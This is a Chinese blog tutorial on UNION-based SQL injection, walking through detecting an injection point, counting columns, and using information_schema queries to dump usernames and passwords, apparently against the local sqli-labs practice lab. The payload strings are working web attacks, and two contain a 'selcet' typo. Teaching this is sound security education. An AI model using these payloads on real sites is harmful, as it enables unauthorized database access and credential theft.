二、SQL注入之联合查询

已于 2023-09-21 18:13:26 修改
阅读量735 收藏 2
点赞数
分类专栏: web渗透测试 文章标签: sql oracle 数据库
于 2023-08-21 14:02:34 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_55202378/article/details/132406875
版权

文章目录

1、SQL注入原理

  SQL注入(Sql Injection)就是Web应用程序对用户输入数据的合法性没有判断,前端传入后端的参数时攻击者可控的,并且参数带入数据库查询,攻击者可以通关构造不同的SQL语句来实现对数据库的任意操作。

2、SQL注入的两个关键点

  • 参数用户可控:前端传入后端的参数内容是用户可以控制的。
  • 参数带入数据库查询:传入的参数拼接到SQL语句,且带入数据库查询。

3、SQL注入的危害

  • 攻击者利用SQL注入漏洞,可以获取数据库中的多种信息(例如:管理员后台密码),从而脱取数据库中内容(脱库)。
  • 在特别情况下还可以修改数据库内容或者插入内容到数据库,如果数据库权限分配存在问题,或者数据库本身存在缺陷,那么攻击者可以通过SQL注入漏洞直接获取webshell或者服务器系统权限。

4、SQL注入基础

4.1 MySQL相关

  在mysql数据库中存在一个Information_schema数据库,这个数据库里面存在两张表。一个是tables表,里面存有所有的表名和数据库名;另一个是columns表,里面存有所有的字段名,字段所属的表名,字段所属的库名。以下是关于Information_schema数据库的拓扑图:

在这里插入图片描述

4.2 SQL注入流程:

  由于关系型数据库,具有明显的库/表/字段/字段内容结构层次,在对SQL注入漏洞的注入过程中获取数据库信息的时候,也可以按照这种顺序:

数据库名 ⟶ \longrightarrow 表名 ⟶ \longrightarrow 字段名 ⟶ \longrightarrow 字段内容

  手工注入流程:

  • 寻找传参页面;
  • 判断是否存在注入点;
    • 字符型注入?
    • 数字型注入?
  • 判断字段的数量;
  • 判断字段回显的位置;
  • 查找数据库名、表名、字段名、字段内容;
  • 登录后台。

(1)判断注入点

  • and 1=1 / and 1=2 回显页面不同(整形判断)
  • 单引号判断 ‘ 显示数据库错误信息或者页面回显不同(整形、字符串类型判断)
  • ’ and ‘1’ = '1 / ’ and ‘1’ = '2 回显页面不同(字符型判断)
  • and sleep(5)(判断页面返回时间,万能)
  • 在SQL语句中,and的优先级比or高。
  • SQL语句注释:# 或者 --[space] 或者 --+

(2) SQL注入分类

  • 根据注入点的数据类型,可分为:
    • 数字型注入
    • 字符型注入

❗️❗️❗️二者最大的区别在于:字符型需要闭合,整型不需要闭合。

  • 根据数据库执行的结果,可分为(四大基本手法):
    • 联合查询
    • 报错注入
    • 布尔盲注
    • 延时注入
  • 根据数据提交的方式,可分为:
    • Get注入
    • Post注入
    • Cookie注入
    • HTTP头部注入
  • 其他注入类型:
    • base64注入
    • 宽字节注入
    • 搜索型注入
    • 读写文件

5、联合注入实例基本步骤

  联合查询是可合并多个相似的选择查询的结果集。等同于将一个表追加到另一个表,从而实现将两个表的查询组合到一起,使用谓词为UNIONUNION ALL

(1)寻找传参页面,http://xxx.com/index.php?id=1

在这里插入图片描述

(2)判断注入点,127.0.0.1/sqli/less-1/index.php?id=1'

在这里插入图片描述

可以根据报错信息判断:如果是字符型注入,应该闭合什么符号,此处是闭合单引号。

(3)判断字段数量,order by命令,127.0.0.1/sqli/less-1/index.php?id=1’ order by 3 --+

在这里插入图片描述

1后面的‘是为了闭合SQL语句中的引号

(4)判断回显位置,127.0.0.1/sqli/less-1/index.php?id=1’ union selcet 1,2,3 --+

在这里插入图片描述

(5)查数据库名,127.0.0.1/sqli/less-1/index.php?id=1’ union selcet 1,2,database() --+

database():查看当前数据库名

(5)表名

  • 查表名:select group_concat(table_name) from information_schema.tables where table_schema='security'
  • information_schema.tables:指定information_schema数据库中的tables表;
  • table_schema字段:保存所有的数据库名;
  • table_name字段:保存所有的表名;
  • group_concat()函数:输出所有属于‘security’数据库的所有表

在这里插入图片描述

(6)字段名

  • 查询字段名:select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'

在这里插入图片描述

(7)字段内容

  • 查询字段内容:select group_concat(concat(username,'%23',password)) from security.users

concat()函数:拼接。例如:
concat(‘hello’,‘+’,‘world’) ⟶ \longrightarrow 输出:hello+world

在这里插入图片描述

在这里插入图片描述

6、总结

  sql注入的基本流程:

  • 寻找传参页面;
  • 判断是否存在注入点;
    • 字符型注入?
    • 数字型注入?
  • 判断字段的数量;
  • 判断字段回显的位置;
  • 查找数据库名、表名、字段名、字段内容;
  • 登录后台。
PT_silver
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
SQL注入联合查询
m0_56578216的博客
08-22 903
适用数据库中的内容会回显到页面中来的情况。联合查询就是利用union select 语句,该语句会同时执行两条select 语句,实现跨库、跨表查询。两条select 语句查询结果具有相同列数:对应的列数据类型相同(特殊情况下,条件被放松)。联合查询就是利用SQL语句中的union select语句同时执行两条select语句,实现跨表查询的方法。由于联合查询会将数据库中的两张表按照列数拼接(纵向拼接)后再进行查询,所以要求两条select语句查询的表必须******
SQL注入——联合查询union
Cwillchris的博客
06-02 446
SQL注入联合查询超详细原理讲解
SQL 注入——联合查询
weixin_51559599的博客
11-06 692
information_schema 元数据库中的 columns 表中存储着数据库中所有的列。information_schema 元数据库中的 tables 表中存储着数据库中所有的表。语句,该语句会同时执行两条 select 语句,实现跨库、跨表查询。如果报错,则说明没有该列,继续向小的数字更改查询,直到查询出列数最大值。总共有 517 个表名,因为此前查出在 cms 表中,增加筛选条件。此处因为联合查询,每列的数据类型不同而报错,将。查看 cms_users 表中的字段。连接显示出整列中的内容。
sql注入详解
热门推荐
good good study
05-05 20万+
SQL注入SQL Injection)是一种常见的Web安全漏洞,主要形成的原因是在数据交互中,前端的数据传入到后台处理时,没有做严格的判断,导致其传入的“数据”拼接到SQL语句中后,被当作SQL语句的一部分执行。 从而导致数据库受损(被脱库、被删除、甚至整个服务器权限陷)。 即:注入产生的原因是后台服务器接收相关参数未经过滤直接带入数据库查询...
sql注入联合查询注入
qq_50953689的博客
05-04 1520
判断数据显示点 (id一定要改为0或负数) id=0' union select 1,2,3 主要作用:测试数据库表中的有效column是哪几列
SQL注入联合查询注入
qq_45691294的博客
07-11 7375
MySQL中的联合查询 联合查询是可合并多个相似的选择查询的结果集。等同于将一个表追加到另一个表,从而实现将两个表的查询组合在一起,使用为此为UNINO或UNION ALL 联合查询:将多个查询的结果合并到一起(纵向合并):字段数不变,多个查询的记录数合并 基本语法: select 语句 union[union选项] select 语句; 联合查询注入的条件 联合查询注入是MySQL注入中的一种方式,在SQL注入中说了注入漏洞存在的相关条件,而联合查询注入这种方法需要满足查询的信息在前端有回显,回显数据的
sql注入联合查询
笔墨稠思
07-07 1028
本次注入采用DVWA作为靶场,数据库采取mysql 首先我们设置一下dvwa的安全等级 修改等级后点击submit按钮,之后我们进入sql注入的实战靶场 联合查询注入,我们需要用到 union 来连接两条sql语句 一.判断注入类型 他给了我们一个form表单,让我们提交一个user ID进去,这个注入点很明确,肯定是我们输入进去的id了,id一般都是int 类型的,但也有可能是字符串类型的 那数据库的查询语句可能是 select * from 表 where id = $user_id 也可能是
sql注入联合注入
m0_59576693的博客
09-19 632
sql联合注入联合注入细节以及联合注入流程和联合注入payload
SQL注入-联合查询注入
m0_53820621的博客
08-10 3527
SQL注入-联合查询注入
SQL注入笔记-union联合查询
03-21
SQL注入笔记-union联合查询
SQL二次注入和截断联合使用
12-14
这次主要是说明sql的二次注入sql插入数据库时...在下一次进行需要进行查询的时候,直接从数据库中取出了脏数据,没有进行进一步的检验和处理,这样会造成SQL的二次注入。比如在第一次插入数据的时候,数据中带有单
sql注入联合查询,最详细的CMS联合查询过程!!!!
08-22
本案例聚焦于CMS(内容管理系统)中的SQL注入,特别是联合查询的利用方法。 【联合查询】是SQL注入的一种技术,允许攻击者合并两个或更多的SELECT语句,以便在不直接访问数据库的情况下获取信息。在这个场景中,...
sql注入讲解ppt.pptx
08-10
二、SQL 注入基础知识: 1. PHP 语言基础:了解 PHP 语言的基础知识,熟悉 MySQL 的一些函数和语句。 2. MySQL 语句内容:熟悉 MySQL 的一些基本语句,如 SELECT、INSERT、UPDATE、DELETE 等。 3. MySQL 数据库结构...
SQL 注入天书.pdf
08-06
SQL注入是一种常见的网络安全漏洞,发生在应用程序使用用户输入的SQL代码直接构建数据库查询时。当攻击者能够通过输入恶意SQL语句来控制或篡改数据库查询,他们就能获取敏感信息、修改数据甚至完全控制系统。《SQL...
MySql 主从同步会不会影响到SQL执行速度?
weixin_44892327的博客
07-24 801
作用:负责将主库的二进制日志(binary log)数据传输到从库。工作方式:当从库连接到主库时,主库会为每个连接的从库开启一个 Binlog Dump 线程。这个线程从主库的二进制日志中读取日志记录,并将其发送给从库。Binlog Dump 线程:将二进制日志传输给从库。Binlog Dump GTID 线程(在启用 GTID 模式时):处理 GTID 相关的复制任务。
SQL进阶:解锁高级特性,深化数据洞察
WayneYalejk的博客
07-24 389
掌握了SQL的基础知识后,进一步探索其高级特性将帮助您更高效地处理复杂数据,深化数据分析的广度和深度。本文将带您领略SQL的高级功能,包括窗口函数、存储过程、触发器以及高级查询技巧等,让您在数据处理的道路上更进一步。通过这两篇文章,读者可以从SQL的基础知识逐步深入到高级特性,全面掌握SQL在数据处理和分析中的强大能力。
sql server 连接报错error 40
只会helloworld的小白啊的博客
07-24 257
Microsoft.Data.SqlClient.SqlException (0x80131904): A network-related or instance-specific error occurred while establishing a connection to SQL Server. The server was not found or was not accessible. Verify that the instance name is correct and that SQL S
SQLynx数据库管理工具
最新发布
core815的专栏
07-24 342
SQLynx数据库管理工具
sql注入union联合查询
05-19
SQL注入是一种针对数据库的攻击方式,攻击者通过构造恶意输入,将SQL语句的语义进行修改,从而达到非法访问、篡改和删除数据等目的。其中,union联合查询就是SQL注入中常用的一种方式。 在SQL语句中,union是用来连接两条或多条select语句的关键字,它可以将两个查询结果合并成一个结果集。攻击者可以通过在输入框中输入一些特殊的字符或者语句,使得SQL语句被修改,例如: ``` SELECT * FROM users WHERE name = 'admin' AND password = '123456' ``` 攻击者可以在输入框中输入如下内容: ``` admin' UNION SELECT 1,2,3,4-- ``` 这样,SQL语句就会变成: ``` SELECT * FROM users WHERE name = 'admin' UNION SELECT 1,2,3,4--' AND password = '123456' ``` 这条SQL语句的含义是:先查询用户名为admin的用户信息,然后将查询结果与1,2,3,4合并成一个结果集。由于这条语句中的1,2,3,4并没有实际意义,所以攻击者可以通过不断尝试,来获取不同的信息。 为了防止SQL注入攻击,开发人员应该对输入的数据进行过滤和验证,特别是对于涉及到数据库操作的输入,更应该进行严格的验证和过滤。一般来说,可以采用参数化查询、白名单过滤、限制字符集等方式来防止SQL注入攻击。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值